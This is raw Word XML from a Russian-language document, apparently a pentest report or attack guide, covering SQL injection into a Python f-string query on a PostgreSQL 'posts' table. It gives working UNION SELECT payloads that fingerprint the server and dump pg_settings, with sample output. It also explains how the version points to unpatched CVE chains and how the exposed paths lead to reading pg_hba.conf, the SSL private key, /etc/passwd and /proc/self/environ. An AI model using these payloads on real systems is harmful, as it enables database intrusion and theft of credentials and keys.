        <w:t xml:space="preserve">    topic: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f"SELECT id, title, published_at FROM posts WHERE topic = '{topic}'"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Три колонки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timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Метаданные приводятся к этим типам естественно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / строка / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">now()</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A — `version()` (быстрый отпечаток)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Один вызов — major.minor, ОС, компилятор, дата сборки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `topic`):</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version(), now()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published_at FROM posts WHERE topic = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, version(), now()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title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ответа — строка вида:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 16.4 (Debian 16.4-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что атакующий из этого извлекает за один запрос:</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Major version (16)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → определяет, какие CVE из раздела 4 применимы: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MERGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть с PG 15 → CVE-2023-39418 (R11) применим, если 15.x ≤ 15.3.</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pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть с PG 17 → CVE-2022-1552 (R15) уже не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есть с PG 14 → можно цепляться через эту роль вместо superuser-а.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Minor version (.4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → точный CVE-status. Для 16.4: непропатчено CVE-2024-10976…10979 (фикс в 16.5), непропатчено CVE-2025-1094 (фикс в 16.7), непропатчено CVE-2025-8713 (фикс в 16.10). Атакующий сразу знает 4 цепочки, которые точно работают.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Distribution (Debian 16.4-1.pgdg120+1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → пакетная сборка от PGDG; конкретные пути файлов конфигурации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/postgresql/16/main/postgresql.conf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data_directory=/var/lib/postgresql/16/main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Debian-layout). На Alpine / Red Hat / Windows пути другие (см. 3.6.3 Payload B). RHEL-вариант обычно выглядит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(PostgreSQL.org RPM, 16.4-1PGDG.rhel9)</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OS (`x86_64-pc-linux-gnu`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Linux → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/environ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/etc/passwd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/var/log/...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> достижимы через 3.6.3. Если в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mingw32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Visual C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Windows → пути в стиле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\PostgreSQL\16\data\postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + специфичный auth (NTLM-coercion через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в 3.6.2).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Compiler (`gcc 12.2.0`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → для memory-corruption CVE (CVE-2023-5869) важно знать, что бинарь не построен с дополнительными mitigations (FORTIFY_SOURCE и т.п.). Прямого пути эксплуатировать через SQL не даёт, но для chain с RCE — релевант.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — GUC-параметры пакетом (server_version_num, пути конфигов, SSL, preloaded)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 строка для человека; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server_version_num</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — integer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">160004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для 16.4, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">170002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для 17.2), удобнее для машинного сравнения. И сразу — пути конфигов и ключевые параметры безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `topic`):</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name || ' = ' || setting, now() FROM pg_settings WHERE name IN ('server_version_num', 'data_directory', 'config_file', 'hba_file', 'ident_file', 'ssl', 'ssl_cert_file', 'shared_preload_libraries', 'session_preload_libraries', 'log_destination', 'log_statement', 'row_security', 'lc_collate')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published_at FROM posts WHERE topic = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, name || ' = ' || setting, now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_settings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name IN (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'server_version_num', 'data_directory', 'config_file', 'hba_file',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'ident_file', 'ssl', 'ssl_cert_file', 'shared_preload_libraries',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'session_preload_libraries', 'log_destination', 'log_statement',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'row_security', 'lc_collate'</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Типичный вывод на standalone PG 16.4 (Debian):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server_version_num = 160004</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data_directory = /var/lib/postgresql/16/main</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">config_file = /etc/postgresql/16/main/postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hba_file = /etc/postgresql/16/main/pg_hba.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ident_file = /etc/postgresql/16/main/pg_ident.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl = on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shared_preload_libraries = pg_stat_statements,pgaudit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">session_preload_libraries =</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_destination = stderr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement = ddl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security = on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lc_collate = en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что добавляет к Payload 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`data_directory`, `hba_file`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → точные пути к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data_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без угадывания дистрибуции — следующий шаг через 3.6.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_file('/etc/postgresql/16/main/pg_hba.conf', 0, 10000)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`ssl = on` + `ssl_cert_file`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → точный путь к SSL-сертификату (приватный ключ рядом, обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.key</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.pem</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.crt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — цель для 3.6.3 Payload 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`shared_preload_libraries`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
